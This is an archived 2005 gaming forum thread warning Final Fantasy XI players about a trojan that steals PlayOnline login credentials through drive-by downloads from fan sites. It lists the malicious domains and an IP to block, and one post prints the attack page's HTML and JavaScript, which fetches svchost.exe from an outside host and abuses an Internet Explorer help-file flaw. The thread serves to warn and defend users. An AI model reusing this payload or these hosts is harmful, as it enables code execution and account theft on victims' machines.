It is currently Wed May 07, 2025 11:01 am View unanswered posts | View active topics |


Board index » General Gaming » Final Fantasy XI


Post new topic Reply to topic  [ 8 posts ] 
Author Message
 Post subject: Trojan Warning
PostPosted: Thu Nov 10, 2005 5:47 pm 
Crumpet
Crumpet
User avatar

Joined: Thu Jul 01, 2004 5:57 am
Posts: 5363
Location: England
If you frequent any JP sites (such as PhotoII looking for any interesting FFXI screenshots posted) be careful what you click on. There's a trojan going around right now (circulating JP sites) in the forum of a simple Hyperlink to a couple of websites that people are just posting on these forums etc.

The website downloads a program to your computer using a bit of Javascript and a flaw in the windows help system that allows it to execute code. It download and runs a "SVCHOST.EXE" to your system, which will grab your POL ID and Password next time you log in. It's not a Key logger, it doesn't need to wait for you to type it in, it just needs you to run POL.

About 50 accounts are supposedly confirmed to be stolen by this now. The IP addresses of the sites hosting the Trojan are supposedly Chinese. Few sites known to install the trojan:

www-japan213-com
www-1102213-com
ff11-free-sakura-ne-jpi/nove/00-00.html
homepage3-nifty-com/~ffxi/Shield.html

Probably a ton more, those are just sites confirmed to do it if you visit them.

The following HEX view of the trojan executable seems to show that the program reads your login information from a temporary file in the PlayOnline Viewer folder that stores your ID and Password. It then opens what appears to be a simple ASP page that sends the author your details.

Image

The executable shows the ASP page being stored on the domain above, so the best thing to do right now would be to block that domain on your firewall. If somehow you got infected, hopefully it wouldn't be able to get through. Dots were replaced by dashes so hopefully nobody accidentally follows the link somehow. Block this:

www-japan213-com = 211-100-26-182

Note: "SVCHOST.EXE" is also the name of the Windows Service Host, and most (if not all) Firewalls will allow it access to the Internet by default. So don't expect your Firewall to trap it. It might do so, but don't give it the chance.


Top
 Profile  
 
 Post subject:
PostPosted: Thu Nov 10, 2005 6:05 pm 
Crumpet
Crumpet
User avatar

Joined: Thu Jul 01, 2004 5:57 am
Posts: 5363
Location: England
Decided to try to Telnet to that server to see what happens, lol.

Code:
Welcome to Microsoft Telnet Client

Escape Character is 'CTRL+]'

Microsoft Telnet> o www,1102213,com 80

GET http://www,1102213,com/ff11help/money.htm HTTP/1.0


HTTP/1.1 200 OK
Connection: close
Date: Thu, 10 Nov 2005 23:01:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 765
ETag: "ac44b9fe62dcc51:1d5679"
Last-Modified: Sat, 29 Oct 2005 08:30:18 GMT
Content-Type: text/html

<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://www,1102213,com/ff11help/svchost.exe"></SC
RIPT>
<SCRIPT language=JavaScript>function sopen(){try{window.showModelessDialog("mone
y1.htm","","status:no;scroll:no;dialogHeight:100px;dialogWidth:100px;dialogTop:2
000px;dialogLeft:2000px;help:no;");self.focus();}catch(e){}}
ie=navigator.appVersion;
if(ie.indexOf("MSIE 5.0")==-1 &&
ie.indexOf("NT 5.2")==-1&&
!(ie.indexOf("NT 5.1")!=-1&&navigator.appMinorVersion.indexOf("SP2")!=-1)
){setTimeout('sopen();',0);}else{
document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scri
ptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.1102213.com/ff11help/icyfox.
chm::/%23.htm"></OBJECT>');}</SCRIPT></BODY></HTML>

Connection to host lost.

Microsoft Telnet>


Yeah, definately a trojan there, lol. If you're gonna be curious like me, make sure you know what the heck you're doing.


Top
 Profile  
 
 Post subject:
PostPosted: Thu Nov 10, 2005 6:08 pm 
Strong Confident Black Woman
Strong Confident Black Woman
User avatar

Joined: Thu Jul 07, 2005 1:43 pm
Posts: 313
Location: Montreal, Canada
thanks a lot for the warning ketrebu! never look at JP sites but perhaps one day by accident you may stumble upon a link or somthing. I just configed my firewall to block that site.

_________________
LV75 Dark Knight LV75 Black Mage 75 Warrior
SJ: THF53 NIN40 RDM37 WHM37 SAM41

Image
OO_SKYLINE_OO


Top
 Profile  
 
 Post subject:
PostPosted: Thu Nov 10, 2005 6:14 pm 
Too Weak
Too Weak
User avatar

Joined: Thu Aug 05, 2004 6:02 pm
Posts: 45
Location: England
sooo yea... how do you get your firewall to block it? haha

<< doesnt know shit about PCs


Top
 Profile  
 
 Post subject:
PostPosted: Thu Nov 10, 2005 6:56 pm 
Star-Spangled Subligar
Star-Spangled Subligar
User avatar

Joined: Wed Dec 31, 1969 7:00 pm
Posts: 15671
Location: THE DOJO
Thanks for the heads up ket. Gonna avoid going on any FFXI sites with my FFXI computer.

Ill just use my laptop for all my browsing.


if anyone finds a site list it here so we know to avoid it.

_________________
COBRA KAI DOJO NEVER DIES
RIP Shiloh


Top
 Profile  
 
 Post subject:
PostPosted: Thu Nov 10, 2005 7:34 pm 
Strong Confident Black Woman
Strong Confident Black Woman
User avatar

Joined: Thu Jul 07, 2005 1:43 pm
Posts: 313
Location: Montreal, Canada
Reorn wrote:
sooo yea... how do you get your firewall to block it? haha

<< doesnt know shit about PCs

if you have norton 2005 just click the firewall tab and select config. then click on the Network tab and click restricted then click add then just enter the IP or site. not very complicated

_________________
LV75 Dark Knight LV75 Black Mage 75 Warrior
SJ: THF53 NIN40 RDM37 WHM37 SAM41

Image
OO_SKYLINE_OO


Top
 Profile  
 
 Post subject:
PostPosted: Thu Nov 10, 2005 9:01 pm 
Father of Evil Twin Tarus & 1 Mastermind
Father of Evil Twin Tarus & 1 Mastermind
User avatar

Joined: Mon Aug 02, 2004 5:35 am
Posts: 3708
Location: Look out below and above!
lol my anti-virus had already got this virus protected from last month and its never found that virus yet so I got lucky. :o

_________________
ImageImage PS3 Friend list name: Pantherxx Wii code 1629-0463-4657-0263 (revised 9/28/07) Steam ID - Pantherxx010 62BLU 75PLD Reactived 7/5/10 I dare you Click this!


Top
 Profile  
 
 Post subject:
PostPosted: Fri Nov 11, 2005 3:31 am 
Easy Prey
Easy Prey

Joined: Mon May 02, 2005 1:19 pm
Posts: 368
Location: California
Thus the NA Onry movement was started!

_________________
Image
o_o The product of MNK73/THF25

http://ffxi.allakhazam.com/profile.xml?72267


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 8 posts ] 

Board index » General Gaming » Final Fantasy XI


Who is online

Users browsing this forum: No registered users and 7 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group